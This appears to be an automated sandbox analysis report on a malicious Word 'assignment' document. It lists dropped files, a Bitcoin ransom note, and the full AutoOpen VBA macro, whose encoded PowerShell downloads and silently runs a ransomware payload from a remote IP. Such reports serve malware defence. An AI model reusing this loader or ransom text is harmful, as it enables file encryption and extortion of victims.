ctaq`cb~vkbbrciu`iggg~aoscn`vagoy{nncpqhwwtcp|~.gxgtofntejf{n`bd}eyiqcyurqbbjawuz{`bwav`zauufyyp}wxyv|pyp{gf{s{b}tzcpkwfgk|vaz~x~cp{cbzjis|.}}ii`miny.p.bhaa{x|vb|iy|a.p}xcdivzbfx{w~tg|bny|e.tc{ufqaiavwzf.lpuanaeu~sboibp.x
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.958005779190394
                                                  Encrypted:false
                                                  SSDEEP:24:gCD2H8fbe5q96Fh6LlTVw2FcVRmeMfp/cR8q7vG1dYf7Ltbb:gj5O2+1VER5axi8q7vG1GLtbb
                                                  MD5:58A8C6F9B4D2AEDA202460E785B7FDC3
                                                  SHA1:B3063A5D6E20C521F613DEFC6778AF7E25DC39A8
                                                  SHA-256:3F6420CD0D659D532EA3981B40AF41CB6B47C32126F31C62C739EEB74DD3669B
                                                  SHA-512:2FD798F8BFB31A5D5C228FA4DEC71C50A621A06B1F0AFFF8D2B38B6AF541A6E45EDA0784CCE155BBED1F94D38C4409865B0E370E509325061A4B3706DD4DE27B
                                                  Malicious:false
                                                  Preview:e}b}r`}meik}bftmudr|e}pwc~nvciyxvlap.~vzihclxm|fryyqvd.iogcsap{.tx`f~qr}rmdlvdvwxb|lzyyyy{s~pytzy}tyofnyvfry{mmt`tfh.xedetypua}k}nqjbuvbmd{q`szfw||attps`}`rdxl|gkprexunddcu`wvrluip`t|m.nxrxnq~zaq`}.pdr{fvpdq|cqk}jf}qhgfdtfr`zswe}e~sg||nrj}us.{zvj~r`zvczo{`zpwe|}~v|liupksvthszydtrtpb~uiikjg~aoe.ddvr.zuxzbpltpyyjwwapzcuonicdg||v`t~zyjqtevg~i~yp{oefxwbjt{orvp.}qirptrg`z}idomvjbn{etzv`xw.m~fedgbbyqfsjg|jl{lwvpbg.qhvptwad.zdrfkh~e}lu}vcubfpkisvzyheczgp``t}.rs|}c~e~seiybiremppbkwapsla.aqfw~k.zyprr.lcocl.tycpda`pcuvd~w.a~jtfv.}waob`|~zzx.ca.hyq|ozj}dax.ui|cslyze~}syk~.wwxyq|opda|p`|yuuv|gwtdq{plc}b|ytvk|yqe{}krxw|cnhcb|ad~nui|c|ouz|~vyutg}yuy`wppplk}.ojxkxp.v}x{eeuuhmo{fmwf}sp|te.euc~hizxsbsjgq.xs`bbd{rl.c~gz{rcbz.bvs`aear`grd|dd`b{p`{gbr~annffp}yud~fjvpy{yjku.tqeweial.d`upffwktix~bbyeznzumq.ctg}~krx{jz|gub`ked`ni{vc.rp`|b~nlksfxucvps|.xqhebfgbjstmdpt~.smadzuvqnddks.fpqfqke{ywt}gabuj~u.lq|y.axlh}u.zcxlpzfn}ztks{ottu}}.dh`y.w}fzkqte~cwyce{nme{susqwdv}u~e~gz.|u`cb~hutsgutfzglge~{s`yzwjt.vuiij.b
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.958005779190394
                                                  Encrypted:false
                                                  SSDEEP:24:gCD2H8fbe5q96Fh6LlTVw2FcVRmeMfp/cR8q7vG1dYf7Ltbb:gj5O2+1VER5axi8q7vG1GLtbb
                                                  MD5:58A8C6F9B4D2AEDA202460E785B7FDC3
                                                  SHA1:B3063A5D6E20C521F613DEFC6778AF7E25DC39A8
                                                  SHA-256:3F6420CD0D659D532EA3981B40AF41CB6B47C32126F31C62C739EEB74DD3669B
                                                  SHA-512:2FD798F8BFB31A5D5C228FA4DEC71C50A621A06B1F0AFFF8D2B38B6AF541A6E45EDA0784CCE155BBED1F94D38C4409865B0E370E509325061A4B3706DD4DE27B
                                                  Malicious:false
                                                  Preview:e}b}r`}meik}bftmudr|e}pwc~nvciyxvlap.~vzihclxm|fryyqvd.iogcsap{.tx`f~qr}rmdlvdvwxb|lzyyyy{s~pytzy}tyofnyvfry{mmt`tfh.xedetypua}k}nqjbuvbmd{q`szfw||attps`}`rdxl|gkprexunddcu`wvrluip`t|m.nxrxnq~zaq`}.pdr{fvpdq|cqk}jf}qhgfdtfr`zswe}e~sg||nrj}us.{zvj~r`zvczo{`zpwe|}~v|liupksvthszydtrtpb~uiikjg~aoe.ddvr.zuxzbpltpyyjwwapzcuonicdg||v`t~zyjqtevg~i~yp{oefxwbjt{orvp.}qirptrg`z}idomvjbn{etzv`xw.m~fedgbbyqfsjg|jl{lwvpbg.qhvptwad.zdrfkh~e}lu}vcubfpkisvzyheczgp``t}.rs|}c~e~seiybiremppbkwapsla.aqfw~k.zyprr.lcocl.tycpda`pcuvd~w.a~jtfv.}waob`|~zzx.ca.hyq|ozj}dax.ui|cslyze~}syk~.wwxyq|opda|p`|yuuv|gwtdq{plc}b|ytvk|yqe{}krxw|cnhcb|ad~nui|c|ouz|~vyutg}yuy`wppplk}.ojxkxp.v}x{eeuuhmo{fmwf}sp|te.euc~hizxsbsjgq.xs`bbd{rl.c~gz{rcbz.bvs`aear`grd|dd`b{p`{gbr~annffp}yud~fjvpy{yjku.tqeweial.d`upffwktix~bbyeznzumq.ctg}~krx{jz|gub`ked`ni{vc.rp`|b~nlksfxucvps|.xqhebfgbjstmdpt~.smadzuvqnddks.fpqfqke{ywt}gabuj~u.lq|y.axlh}u.zcxlpzfn}ztks{ottu}}.dh`y.w}fzkqte~cwyce{nme{susqwdv}u~e~gz.|u`cb~hutsgutfzglge~{s`yzwjt.vuiij.b
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.943824797057364
                                                  Encrypted:false
                                                  SSDEEP:24:nFfF/GOMBMlTTA5Q4RJXAUBobpGUOLPfL3Dk9aW+C5upW9B:n86lfB4PAYUGUiLT+ahCRB
                                                  MD5:25C5BB9BD6764270F95F127A8FD67561
                                                  SHA1:2D09773F0376DC9132029C2EC8DFD8C857542F06
                                                  SHA-256:00DBAB57ECA07804C0CABB4CC7B5A7140BE7578EC380CD24CB4DE88507EB01FE
                                                  SHA-512:029C4ECAB84CD0D251C5AD10AD76B1DCBE78BE3BF90B69F0C6F08385E8B8F1A5816718D55F85A153E9790A5D5FC7F4E7F816426AFFA62C1DD5890D2C5CBCFD55
                                                  Malicious:false
                                                  Preview:dz`|b|ylizxfcxucxy`iz{z.z|i{eet`pjadpaqeb.gsut|yvpld|vvwnwboxc~gmzvb`wtzraeob`skvfrq`qu~dcvb.kstsn{dtl`dk~ts}tyt}bqwytcllrxgq.rr|`duwutl~bcetb~d~aakdb}quphlwxbmhquxqzob|ve.sohfvyl}uu~rwiucpo{{zzwzwj`gd{`wj~bk.k~{uq|syupa{mtyzft`zcvutrby}y{todjyokdast`qzwarqts.plpne|kaqx|ccyzbbtg``m|~pq|onv}{lv}~xgqndxgcufw|.gzpyec{.v{pv`pfesppe|nuwt|wvyxdxg`~yrds`||cepoknffttzgvx~le}v.~ayrasngw.drjyea{}vy}dq`un{wxa~t.p.aytwystids|uv`qz.{|paz~ook}ru.gwvbh.}ns|}krby{zzut|.z`lbz|~xcozawfxrykztwsox.~qwp.fsemg~x}j{|{`{hrf.m|j}rpx|ytoxw~hapgsbiu.vx}|fnn{bqar{a{`djyskpjhom|rb{{xbretmy.r|butloxnprtgp`bzzpj~ikimqcr`p}ka{dsqcy|t`|qdznnicb`fz}|rv|khmxvpxsfxz|wyio.~z~abalt`h.|a}o`|ovxpcgto~mwy}cxfycnqgpeas}|.qxrrzynm|{yoptevpplvgigb{ba}me.tby{`r.gfrtt|cs|pzzp|tgvtmzw`kqeqbez{fixudl~a{{~yb|s.ci{~~~zfhh}b{r{wp`c~o}rvpb`bspps{|{pu`rvcuyoafmzf.ewyj~ewdl|xxtianwx|`{}wwwyp}bq`zr~{vvfw`pwwoepk~v}~x`~~xf{aewe}t|qncdfwu{k~qxbhtk~lwksqkb.d|rgpllaequl|ptb}.u.{rwfe.ev}qqjjxzycgbk.bps~i.yfw~k~yxnir}lbd{|ft}~qdvq.jbvrnpl|wh.tdz
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.949025847462668
                                                  Encrypted:false
                                                  SSDEEP:24:55FNAZzdEPxx0IV620WHkBEPbXMQujohHEEyigCK0:FExEPxxx/TkBEjMohhfpK0
                                                  MD5:C129E3722D20C8D40D136F43430362DD
                                                  SHA1:F43A255518378C1989420AD17435AC7E74D416ED
                                                  SHA-256:02C5C8ABA48146B66661E55BBAB32A832A88D6FB1E8137892FCB96FACD8C10A1
                                                  SHA-512:8107242D4741A6FD7972D4B3C767AD19269482A5C036649725A7536AE8DF9B3B86A6B36A6AC081E99197BDA371A72F31D778F2E2403A84A3D30135265EE5B535
                                                  Malicious:false
                                                  Preview:ddlsfvt{wk}epd.{`to|~iocqf~.uf{eby}a}n}zuadgyjgfzol}i`v~yieqcepw|~xvfq.nzyvxuxqzp~ylsecyqp}.a}rv|lztqqisgfegu|tf|pikizf|sssy}dpwanauykwtjtc`juq|rdcmrfflrg..ymyobxabqbwnc}fid~vemprazif`ivfpcwe}bhzyli|vqe|wkdd|uy.akraq}ya.bm.kuop`tswpq~}}xf{fcy`q~qcxypq|o|`s}`pc`quber.{nh}yli.cx``j.dujzwanjoo.yvkel~gbzx~~x{lztvzvx{eld|a.mfypyumqenobdduaisaoffyilldcosg}qbz|`nd|gjvwkz`|axbztyi``.d~`u|j|qdy`qu~sfyd}ypyk.sxmzsy~vzow{udrspsrllqzw.b`oauqpeunehiadryyhjbnsyiqgrdbasctgc~}uiwycuxou}upy.dlgrbqjdykkn`zzxsow{~xhekwp}u{ucfsdhm~pxtb|vu~{~zsevzbta.~|pycwdlzwu.`kgqeqjf}w}fig`syj|r..q`i|mfa~kftqrxbodca|iaizvurx{}qzcnqydoichmzbw.`ce`o.pgnjtw`llsbpqgtjywbkora~gd|l}z|qcyu}dbwx~ky{ap`deo|v`bg{|}b`u`|gat}p|zpawzrcndcvdqsz.fr`vbfrlveyou`b.ayhp{ey}.et{tr.tvd`but}vwt{`i|.x|qnu`gti|`|ta.ic{`yimyy`fvv~~px{{x}taxznxvcfv~.~|tny}rc}j}bywtias.opdlbkj~z~nv}ytcbvvzl~bwdzxbvrtqt~xxwk`}wjkj}t~jux`i~wgohw|b}be.qcv{uuyrwymzbz|~fqb|fxj`.yfcv}rwqnqayyrqjppbprpsbhq``ptqcfdqmsd|wj`lwsxomsayxgy~dzfu}wolgsq.x{ipxk|a~zxec.afgo`sjq.
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.94113137895782
                                                  Encrypted:false
                                                  SSDEEP:24:TOJ6fH3p0DjqfjR8M9jei4A2n2SItybrE57p9:TOJ6fH3psqRt4YSItybM9
                                                  MD5:75228F1F3AA87FB6C316017A6F3F2CCF
                                                  SHA1:63E1528AA0DF1C1852E6CCB8504FE8915EA61E88
                                                  SHA-256:B8EDFC10439D46014BAAE227CE600064BF8D07C6B412A89E74F2DEE93651D7E0
                                                  SHA-512:79C956B3057A5F9614A98BFABC244757D0F1EF7A44CBA1DE857CD1248E34A9FA28389268E17869A27151698AA1B9C5E9A3E83CBBAB7A7688CFA92657087C9314
                                                  Malicious:false
                                                  Preview:kk`qtcqjptdcoc|mbvqrhsuz.wye|en.ej}t.aigr.zsfb.{jaqfyt`rsi|okzopk.e}z`il~pb~aa~w|mlopb}}pu~azu`ytaqpf~ifxzus}yxycftvkxwmf{h}ql|gitzf`|rsl`rq}z.rp{ktuxdfez}v|wzofrcyleqrtjy}{kh~dg|itjy{y`yvbb`|a}xmlaijvq`.mox.lr}{.qmu~.uxfowsvyfpfiotgytq`r.eb.`rorpt}w`|sduwbvlcfl~|kogar`vc}{`uinpv{m~kszyicddolg{xwd.}|zd{ikmudmx{zzyltpsscx`.fqow~piik|{|tnyn.frib.fxwb{gk|`kumge}ddio{mq~dyfgykob}dnkvo.qp~qdixz`bs`vtekgnw{sn{hdbqgwbtmazah`mxygjvv{dsw.m}|lizs`y~to`|in}ti`zjpa~mm|wqsarat.cwrs}yb|slptz}g}qfvfq|agfrf{l|}qnwydrlu|`credbq}qpzax.`|puyvtbui|kxgwcy`zaps.r}z{teka.``bw}wjq`fn~nt|j.`~b.uadje|~pnyvpetfpmfzu|~uuf{}pfr~sri`k|{ct}cu{{`ib`d.ttrhtwqw`.x.mgbn.{gbewclybv{~~ap.bmgw.wy`kwv|.kfw{qtnzvvczf~`br.psg|tyd`~rt~ycq}qwbwixkyzzyv}ffp{jwxgy.rf}evtinrvl.fw`|l{ratxzqk}xpfwfyvl.vs~|tv}gqosv{aaioofsg{da{bftrf`c|{f}x}mu}`ex|gv{pgyttr|{prtqc~en}ta.zd|kx`td}bsbiu`frl}|}wy~ax.{}|exi{w{jryqurhm{tfgwexx`{plm~|q|dnoq{nagyu~mghdm~ydf{iextu}pgbetwyse||gtzxaajt`.eqttyprqgx`olt|bgqjo}dyzrada``tbcuat.}qej`xp|f{fnavagqzk`}
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:dropped
                                                  Size (bytes):2489886
                                                  Entropy (8bit):7.9974876463194375
                                                  Encrypted:true
                                                  SSDEEP:49152:3C9TGmzundFtx5fBqn6uSZQ50aHmsQgNOWw0hyHtDYe6+xIxXiVKnIZxEq6Usmwh:3yimzyJ+6uSFaG2NABqbWmusmvzZJC
                                                  MD5:BA267EFDE096C62709D410CCCE5838AE
                                                  SHA1:BA113563402F6AFA9EC6E7300A08CA4C4E7C712C
                                                  SHA-256:A387F74D6F2D56D8A9EA3EC54706A2176BE1CB6FECAF6E6DD1CF71ED84FABBE2
                                                  SHA-512:7E48D7249CA5F64E1DDFF989979573733478E82CA22CC7AD6BFE1C0ED1C3818011E6D70F071F061553F86CC6A16F00A9E91AD66BAE320DEFCAAB1C8612E11D9B
                                                  Malicious:false
                                                  Preview:PK...........Y.n.'z.%.k.].....run.exeUT....{Og!|Ogux..............Z{|.E...<....K...5..#.qWMPqFB.Y..%<VB."1..l.@T.wbf0}.a...@D.....^."....*1.....F|u...b....TuOwO.X.7?....:..sN......$BH2.....@...\./..........+.,.GW...].(...`.G..g.7......r.c.<G..I.G.?0'3-...UF.8B.Xr1Q... Y.Gn..9MFZ/.Z.'.nB.......l..,D}.r.....V?.UN}...U.P.Z...'.M....+..V/Y5.....{....$...O/.#GS{..S....'.1%._.......e......n...,3+8..U.....<....Y.ql.0WR.....qU.W8...3.....:.;....X...$.....\....tN...h3..c..^....ckN.z...a...{.U.yd.l............k*-..F..0.Ch.)'.SV.<...F..>.WB1^x.X8...RZ.=.J.....Z.......x' .....LB...;pQ.eo.....Py.9@..$.V.H+o..sg..l....Hk.:..v.J>...E..;...g/.....ZY[...',y"...u.Pp....+"ms.F.. .z..0...;....F..RS..........j..7@]i..'.xUB_1....<B...G..|......rJ....6.NY..Rn.C..." cov...[8y.I .A.a3A.T..sn.q..P9..,F...>D._.>.J.....B...T..+.j....7..".19..."...NN.....-.2.x...f..C1!8...8:.I....;.l..f..M\..Y :6..8.....N.u....U....i+..<.eB..?a..c4.M....Vh..k.M@-..}*,...k...?..}.
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                  Category:dropped
                                                  Size (bytes):2490070
                                                  Entropy (8bit):7.997492282975181
                                                  Encrypted:true
                                                  SSDEEP:49152:AC9TGmzundFtx5fBqn6uSZQ50aHmsQgNOWw0hyHtDYe6+xIxXiVKnIZxEq6Usmw5:AyimzyJ+6uSFaG2NABqbWmusmvzZJg
                                                  MD5:4EE810EE63926F386F8AF0051EB57A10
                                                  SHA1:6BB8A6302989B847552BBDB1E15F5DE53949003B
                                                  SHA-256:E45924E3990B1EE822258A75583DE09AD79F3C5CB9BA8E074F1DE3BB0D161BB7
                                                  SHA-512:C562B98CBB2BFC65A0DFF53DE9E5A77BBF126BBAB2B581C518853206342EAE1A07C64D2B52CBDC7EEA10433E9BDE8DC1F662923E441A5091A8F4691B6310EC0A
                                                  Malicious:false
                                                  Preview:PK.........YLD*...%...%.....assignment(2).zipUT...]|Og\|Ogux.............PK...........Y.n.'z.%.k.].....run.exeUT....{Og!|Ogux..............Z{|.E...<....K...5..#.qWMPqFB.Y..%<VB."1..l.@T.wbf0}.a...@D.....^."....*1.....F|u...b....TuOwO.X.7?....:..sN......$BH2.....@...\./..........+.,.GW...].(...`.G..g.7......r.c.<G..I.G.?0'3-...UF.8B.Xr1Q... Y.Gn..9MFZ/.Z.'.nB.......l..,D}.r.....V?.UN}...U.P.Z...'.M....+..V/Y5.....{....$...O/.#GS{..S....'.1%._.......e......n...,3+8..U.....<....Y.ql.0WR.....qU.W8...3.....:.;....X...$.....\....tN...h3..c..^....ckN.z...a...{.U.yd.l............k*-..F..0.Ch.)'.SV.<...F..>.WB1^x.X8...RZ.=.J.....Z.......x' .....LB...;pQ.eo.....Py.9@..$.V.H+o..sg..l....Hk.:..v.J>...E..;...g/.....ZY[...',y"...u.Pp....+"ms.F.. .z..0...;....F..RS..........j..7@]i..'.xUB_1....<B...G..|......rJ....6.NY..Rn.C..." cov...[8y.I .A.a3A.T..sn.q..P9..,F...>D._.>.J.....B...T..+.j....7..".19..."...NN.....-.2.x...f..C1!8...8:.I....;.l..f..M\
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):36
                                                  Entropy (8bit):3.2589809036792228
                                                  Encrypted:false
                                                  SSDEEP:3:tR5pXXsJdv:lpHsrv
                                                  MD5:3B94D4A88475096E84B7A37EDA2D944C
                                                  SHA1:B698178C974A16A48E8F104C500A774097E2337F
                                                  SHA-256:022AB28E615B7BC98B8220950FA9FA2FB6AEBF1B33FD6ED8B3D62A45132A8A93
                                                  SHA-512:CF4C9325A5F5FDCD82369D638B36EC04B7301A3952FB0256BEC1B6408BC095AB9FFE9181A9109B9637F475DC8EE6F197C81D8FF9C5B9F6FD3F5C1BF45C30B0EC
                                                  Malicious:false
                                                  Preview:2024-12-21T00:27:23.167752200+00:00.
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:ASCII text
                                                  Category:modified
                                                  Size (bytes):768
                                                  Entropy (8bit):5.2970534108366545
                                                  Encrypted:false
                                                  SSDEEP:12:LhCWvwB0RSOSS+Nsc14lpVwI54zLx1LydJSez8L235+T3qR6GVCjgGnGM/7Kv:LMowGRdSic143VwI6fKDl8C0u6GVCUGk
                                                  MD5:5801747E23363C72301357EDC3A77C54
                                                  SHA1:A86EE38AF5E0F1A17134F15CFF59234985C96446
                                                  SHA-256:DC53586B211B912B0E61BF7828CABFD8E86F94305A446E5DF26E136DF4825D77
                                                  SHA-512:DA99DF8CDD185A3FB7429B8875D5B63F245A70D6F0FAF0BD86EDF6952677A503A6B22A00295C172E686A6B71EB4A4B5A6B9D1C9FC65C6182516B3C051EF5CD34
                                                  Malicious:true
                                                  Preview:YOUR FILES HAVE BEEN ENCRYPTED...YOU HAVE 24 HOURS BEFORE FILE DELETION...DO NOT TAMPER WITH ANY FILES. DO NOT ALLOW ANTI-VIRUS SOFTWARE TO TAMPER WITH ANY FILES. DOING SO WILL RESULT IN LOSS OF DATA AND POSSIBLY MAKE DECRYPTING ALL FILES IMPOSSIBLE...ANY FILES CREATED AFTER ENCRYPTION AND PRIOR TO DECRYPTION WILL BE LOST. ..Your recovery token: 25838..To recover your files, send 0.0032 Bitcoin (approx. 300 USD) to this address:..bc1qf3h74a9gkfxqt0f737mks0mrnzqntm3mwh8nn3...Bitcoin can be bought from exchanges such as Coinbase, Binance, Kraken and more. Search online about how to buy bitcoin if you do not know...Send an email to c0nt4ctu5@proton.me conatining your recovery token and the Bitcoin address listed above and you will receive your decryption key...
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                  Category:dropped
                                                  Size (bytes):6138219
                                                  Entropy (8bit):6.623184548175158
                                                  Encrypted:false
                                                  SSDEEP:98304:Dovppi1bEY4yNd0kJ4P5rzGz+sULgfvINhm/r4O:6pJM0Gzu4Izo
                                                  MD5:CD860C78E0374DEC3A2B1A73507FCE4A
                                                  SHA1:3F3BFA99784864377725873C23A13BB1045C92AE
                                                  SHA-256:AD3129449969566CA74BBFE8A4E2A0A551D2725B1D1F9D5BCCE4E9DD476927B5
                                                  SHA-512:951CD4C4EB66A0B49F3308550C2FBB867F20644551EB042BA97B94BDD05F7C127C856F71AF31582F465BDE23535BDBF0308BBDFEB3C93C6A8A5DB1E8901C4922
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 65%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....{Og..F.;L....&....+..1...F................@..............................G.....W~^...`... ..............................................pF.$!............A..]............F.(A............................?.(....................wF..............................text...(.1.......1.................`..`.data.........1.......1.............@....rdata..`.....1.......1.............@..@.pdata...]....A..^....A.............@..@.xdata..T....@C.......C.............@..@.bss.........`F..........................idata..$!...pF.."...:F.............@....CRT....p.....F......\F.............@....tls..........F......^F.............@....reloc..(A....F..B...`F.............@..B................................................................................................................................................................................................................
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):22
                                                  Entropy (8bit):3.6635327548042538
                                                  Encrypted:false
                                                  SSDEEP:3:sTYZj4n:smU
                                                  MD5:AFD5196F303DE32AEB088260495C1085
                                                  SHA1:5EABF8048028AD721245E8DE867A31DF74230D24
                                                  SHA-256:6689DC33968C9CAC0498528F892DF741C05F7944DC1A78CEB606D39B4D3CE47A
                                                  SHA-512:3DAA4140746448A98D238F3875F4EE629A62957D6EA96576FEB9BF1327ADAC33E93A49F0FA3131B500A1FF3451B2BD1598B02F4880C152F354F440470E3A70F2
                                                  Malicious:false
                                                  Preview:....................;2
                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Template: Normal, Last Saved By: msingh, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 07:00, Create Time/Date: Tue Dec 3 01:15:00 2024, Last Saved Time/Date: Tue Dec 3 22:40:00 2024, Number of Pages: 3, Number of Words: 464, Number of Characters: 2646, Security: 0
                                                  Entropy (8bit):4.852595345153274
                                                  TrID:
                                                  • Microsoft Word document (32009/1) 54.23%
                                                  • Microsoft Word document (old ver.) (19008/1) 32.20%
                                                  • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                                  File name:em_webdev_assignment_dec2024.doc
                                                  File size:81'408 bytes
                                                  MD5:f6029da9935b2b83ecf0194611a31207
                                                  SHA1:91e33bf7a512ace86fc4394a1761d03195d47787
                                                  SHA256:6fa7a912d145bc6a446c6882983981b3ceb91b50090dc0eadd1a7f77d70c6cac
                                                  SHA512:6ae917b6ddd3af1d66e6979fab7e321cf6b76239b00639e1aeb7937d87a2bd44fd326edba71ff5633209ccfc1ded6065d6ae398c4d50a701fe15902ca3939baf
                                                  SSDEEP:768:rJVxj8RO3zkyUd0dTUY65GFhcIjMGPzumTwgAua5xKmcBwKVj5aMEXaCzkFOOOOc:rBPNMSwUjAMaEOOOOONkl3FeFa
                                                  TLSH:D4835E0472A39AD4DDDA0530FDBF9E68A6276CDECEE08213E1A1B71E78331544E05A5F
                                                  File Content Preview:........................>......................................................................................................................................................................................................................................
                                                  Icon Hash:35e1cc889a8a8599
                                                  Document Type:OLE
                                                  Number of OLE Files:1
                                                  Has Summary Info:
                                                  Application Name:Microsoft Office Word
                                                  Encrypted Document:False
                                                  Contains Word Document Stream:True
                                                  Contains Workbook/Book Stream:False
                                                  Contains PowerPoint Document Stream:False
                                                  Contains Visio Document Stream:False
                                                  Contains ObjectPool Stream:False
                                                  Flash Objects Count:0
                                                  Contains VBA Macros:True
                                                  Code Page:1252
                                                  Title:
                                                  Subject:
                                                  Author:
                                                  Keywords:
                                                  Template:Normal
                                                  Last Saved By:msingh
                                                  Revion Number:3
                                                  Total Edit Time:420
                                                  Create Time:2024-12-03 01:15:00
                                                  Last Saved Time:2024-12-03 22:40:00
                                                  Number of Pages:3
                                                  Number of Words:464
                                                  Number of Characters:2646
                                                  Creating Application:Microsoft Office Word
                                                  Security:0
                                                  Document Code Page:1252
                                                  Number of Lines:22
                                                  Number of Paragraphs:6
                                                  Thumbnail Scaling Desired:False
                                                  Company:
                                                  Contains Dirty Links:False
                                                  Shared Document:False
                                                  Changed Hyperlinks:False
                                                  Application Version:1048576
                                                  General
                                                  Stream Path:Macros/VBA/NewMacros
                                                  VBA File Name:NewMacros.bas
                                                  Stream Size:3915
                                                  Data ASCII:. . . . . . . . : . . . . . . . . . { . . . # . . . . . . . . . . . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . 6 . . . . . . < . . . . . . . < . . . . . . . . . . . . . . . . x . . . . . . . . . . ,
                                                  Data Raw:01 16 03 00 04 f0 00 00 00 3a 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 7b 03 00 00 23 0b 00 00 01 00 00 00 01 00 00 00 80 a0 6b 85 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Attribute VB_Name = "NewMacros"
                                                  Sub AutoOpen()
                                                  
                                                    Dim Str As String
                                                  
                                                    Str = Str + "powershell -e JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgAwADgALgAyADAANgAuADEAOQA1AC8AZAAvAGEAcwBzAGkAZwBuAG"
                                                    Str = Str + "0AZQBuAHQALgB6AGkAcAAiADsAJABwAGEAdABoACAAPQAgACIAQwA6AFwAVQBzAGUAcgBzAFwAJABlAG4AdgA6AHUAcwBlAHIAbgBh"
                                                    Str = Str + "AG0AZQBcAHAANAB5AHgAMAByAGwAMABzADMAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAA7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbw"
                                                    Str = Str + "BwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAE4AYQBtAGUAIABBAHQAdAByAGkAYgB1AHQAZQBzACAALQBWAGEA"
                                                    Str = Str + "bAB1AGUAIAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAEEAdAB0AHIAaQBiAHUAdABlAHMAXQA6ADoASABpAGQAZABlAG"
                                                    Str = Str + "4AKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABG"
                                                    Str = Str + "AGkAbABlACgAJAB1AHIAbAAsACAAJABwAGEAdABoACAAKwAgACIAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgApADsARQ"
                                                    Str = Str + "B4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAHAAYQB0AGgAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4A"
                                                    Str = Str + "egBpAHAAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIAAiACQAcABhAHQAaABcAGEAcwBzAGkAZwBuAG0AZQBuAH"
                                                    Str = Str + "QAKAAyACkAIgA7AEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgACIAJABwAGEAdABoAFwAYQBzAHMAaQBn"
                                                    Str = Str + "AG4AbQBlAG4AdAAoADIAKQBcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQ"
                                                    Str = Str + "BvAG4AUABhAHQAaAAgACIAJABwAGEAdABoACIAOwBjAGQAIAAkAHAAYQB0AGgAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAA"
                                                    Str = Str + "IgByAHUAbgAuAGUAeABlACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA=="
                                                    
                                                    CreateObject("Wscript.Shell").Run Str
                                                  End Sub
                                                  
                                                  

                                                  General
                                                  Stream Path:Macros/VBA/ThisDocument
                                                  VBA File Name:ThisDocument.cls
                                                  Stream Size:954
